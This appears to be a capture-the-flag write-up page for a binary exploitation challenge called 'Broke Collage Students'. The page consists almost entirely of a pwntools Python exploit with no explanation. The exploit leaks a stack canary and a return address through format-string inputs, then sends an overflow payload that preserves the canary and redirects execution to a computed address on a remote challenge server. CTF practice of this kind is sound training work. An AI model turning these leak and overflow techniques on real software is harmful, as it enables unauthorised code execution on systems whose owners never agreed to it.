Broke Collage Students

#!/usr/bin/env python3

from pwn import *
args.LOCAL=False
exe = ELF("brokecollegestudents_patched")

context.binary = exe
context.log_console='critical'

def conn():
    if args.LOCAL:
        r = process([exe.path])
        if args.DEBUG:
            gdb.attach(r)
    else:
        r = remote("143.198.184.186", 5001)

    return r

system = int('00005555555554f1',16 )
ret = int('000055555555588c',16)
off=system-ret

def main():
    r = conn()
    r.sendline(b'1')
    r.sendline(b'1')
    r.sendline(b'1')
    r.sendlineafter(b"name?",b"%9$lx")
    
    canary=r.recvlines(4)[3].split(b'What')[0].decode()
    
    print("Leak Canary" + ": " +canary)
    
    r.sendline(b'1')
    r.sendline(b'1')
    r.sendline(b'1')
    r.sendlineafter(b"name?",b"%11$lx")
    
    ret=r.recvlines(4)[3].split(b'What')[0].decode()
    
    print("Leak ret" + ": " +ret)
    
    sytem= int(ret,16)+off
    
    r.sendline(b'1')
    r.sendline(b'1')
    r.sendline(b'1')
    r.sendlineafter(b"name?",b"A"*24+ p64(int(canary,16))+b'A'*8+ p64(sytem))
    r.interactive()


if __name__ == "__main__":
    main()
PreviousPWN NextA Kind of Magic
Last updated 2 years ago